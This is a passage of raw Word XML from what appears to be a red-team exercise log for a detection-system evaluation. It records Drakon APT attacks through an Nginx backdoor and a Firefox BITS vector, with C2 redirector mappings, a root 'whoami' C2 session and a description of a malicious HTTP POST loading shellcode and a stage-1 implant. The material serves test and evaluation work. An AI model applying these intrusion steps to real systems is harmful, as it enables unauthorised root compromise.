        <w:t>16:17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717B36B7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>APT&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEF04B1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sending: '\x08\x00\x00\x00\x16\x00\x00\x00' (8 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5293B7AB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 16 00 00 00                          ........        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F9EBE6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>received:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DB82B1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000000: 25 00 00 00 17 00 00 00 00 00 00 00 0D 00 00 00  %...............</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15317341" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000010: 0D 00 00 00 00 00 00 00 75 69 64 3A 30 20 65 75  ........uid:0 eu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251F4BDF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000020: 69 64 3A 30 00                                   id:0.           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAE79E3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>apt returned: uid:0 euid:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C86C512" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29430195" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>16:18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA073E5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Left connection open overnight</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488AC599" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ECB5B46" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>20190517 13:44</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7933FE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>checked micro on phone, lost connection at some point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740DA7E6" w14:textId="438F753A" w:rsidR="00A351B2" w:rsidRPr="0097593C" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="170" w:name="_flqay3ktxwlc" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="171" w:name="_Toc12600096"/>
      <w:bookmarkEnd w:id="170"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Setup for Wednesday Night Test</w:t>
      </w:r>
      <w:bookmarkEnd w:id="171"/>
    </w:p>
    <w:p w14:paraId="743A77A9"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14] 49.8.46.240:80 -&gt; 128.55.12.167:8114</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>cs: webserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020D88E8"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15] 42.183.7.162:80 -&gt; 128.55.12.167:8115</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>cs: sc server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C49DF28"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16] 133.39.25.45:80 -&gt; 128.55.12.167:8116</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>cs: oc2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1902E830"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17] 98.23.182.25:80 -&gt; 128.55.12.167:8117</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>cadets: sc serve</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F923E13"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18] 4.21.51.250:80 -&gt; 128.55.12.167:8118</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>cadets: oc2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48642110" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36FF7012" w14:textId="16C4CADB" w:rsidR="00781848" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Tested attacks against ta1-cadets-3 and ta1-clearscope-translate-ch58.  We were unable to get the Nginx backdoor to work on the TA1 CADETS host, and as a result, made the decision to use ta1-cadets-3 host for testing to get Drakon APT to work using the Nginx backdoor on Wednesday evening.  As previously stated, we did not have a test phone for ClearScope.  We exploited the backdoors on both the phone and ta1-cadets-3 over and over again.   While this data was generated outside the normal hours of operation for the engagement (9AM EST to 5PM EST), we realize the CADETS data was captured by TA1 performers and likely analyzed by TA2 performers.  We are not including this data in evaluations but would expect to see some</w:t>
      </w:r>
      <w:r w:rsidR="00650FDF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> mention of if from performers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE10D04" w14:textId="70FE1403" w:rsidR="00CE2C66" w:rsidRPr="00FC027E" w:rsidRDefault="00CE2C66" w:rsidP="00CE2C66">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="172" w:name="_Toc12600097"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">05/16/2019 </w:t>
      </w:r>
      <w:r w:rsidR="00650FDF">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>– Nginx and Firefox with Drakon APT and BITS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="172"/>
    </w:p>
    <w:p w14:paraId="7C9EA0DD" w14:textId="1B14BD3F" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="173" w:name="_Toc12600098"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Schedule</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17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475"/>
        <w:gridCol w:w="5865"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A351B2" w:rsidRPr="00FC027E" w14:paraId="4C374D6F" w14:textId="77777777" w:rsidTr="006C3099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6C8E29A8"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09:32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="24E0F71D"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TA1 CADETS 1 and 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5865" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6574C85C"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Nginx Drakon APT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A351B2" w:rsidRPr="00FC027E" w14:paraId="2AD926B7" w14:textId="77777777" w:rsidTr="006C3099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00A27744"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11:03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="73C61A4E"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TA1 FiveDirections 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5865" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="11EC21CB"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Firefox BITS Verifier Drakon APT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67AEF645" w14:textId="7026200B" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cstheme="majorHAnsi"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="174" w:name="_6x9nvb1y0x" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="175" w:name="_Toc12600099"/>
      <w:bookmarkEnd w:id="174"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="175"/>
    </w:p>
    <w:p w14:paraId="3E2AB352"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10] 170.32.78.39:80 -&gt; 128.55.12.167:8110</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>5d: bits oc2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072E2D1B"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11] 215.237.119.171:80 -&gt; 128.55.12.167:8111</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>5d: serve (bits)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11850FE5"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12] 68.149.51.179:80 -&gt; 128.55.12.167:8112</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>5d: thttpd (bits micro)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BF88AD"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17] 98.23.182.25:80 -&gt; 128.55.12.167:8117</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>cadets: sc serve</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EB2F70"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18] 4.21.51.250:80 -&gt; 128.55.12.167:8118</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>cadets: oc2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2787A651" w14:textId="516A6B5B" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="176" w:name="_8jhdxdpskdcb" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="177" w:name="_Toc12600100"/>
      <w:bookmarkEnd w:id="176"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>09:32 -- TA1 CADETS 1 and 2 -- Nginx Drakon APT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="177"/>
    </w:p>
    <w:p w14:paraId="00E712F9" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The attacker tried exploiting each target once unsuccessfully before ta1-cadets-2 was successfully exploited on the second try.  The malformed HTTP POST was sent from 128.55.12.167 and resulted in C2 to 4.21.51.250:80.  The attacker got the hostname and username before the connection was unexpectedly lost, ending the attack. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263F8795" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A0447F8" w14:textId="26D5A3FE" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">For the attack against CADETS the exploits Nginx by simulation of remote code execution on the listening port of the webserver TCP 80.  A malicious HTTP post is sent to 128.55.12.75:80.  This triggers the backdoor which contains a malicious payload with the magic value and shellcode.  Now that the shellcode has been executed on the target, the stage1loader loads the stage 1 capability on the target host which is that actual APT.  This establishes the connection to the C2 and the exploitation of the host is complete.  Now commands </w:t>
      </w:r>
      <w:r w:rsidR="00650FDF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>can be sent and received by C2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3149C711" w14:textId="446134DB" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="178" w:name="_6xh3rxqt9j5" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="179" w:name="_Toc12600101"/>
      <w:bookmarkEnd w:id="178"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="179"/>
    </w:p>
    <w:p w14:paraId="7666A613" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta1-cadets-2</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.75</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FreeBSD 13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFE0B01" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta1-cadets-1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.51</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FreeBSD 13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF918FA" w14:textId="51955A67" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="180" w:name="_5yl2dta9nspx" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="181" w:name="_Toc12600102"/>
      <w:bookmarkEnd w:id="180"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="181"/>
    </w:p>
    <w:p w14:paraId="15401314"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Nginx 1.14.2 Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BD5CC6" w14:textId="7A0860CC" w:rsidR="00CE2C66" w:rsidRPr="00781848" w:rsidRDefault="00A351B2" w:rsidP="00CE2C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Drakon APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1A8F4C" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="182" w:name="_Toc12600103"/>
      <w:r>
        <w:t>Event Log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="182"/>
    </w:p>
    <w:p w14:paraId="38F84761" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="183" w:name="_ff0lec2599w0" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="183"/>
      <w:r>
        <w:t>ta1-cadets-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D72CE1" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>9:32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E18903" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root@kududyn-ProLiant-SL170s-G6:/e5/stage1_cadets/http_post# date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B51E053" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Thu May 16 09:31:23 EDT 2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F17BEBE" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
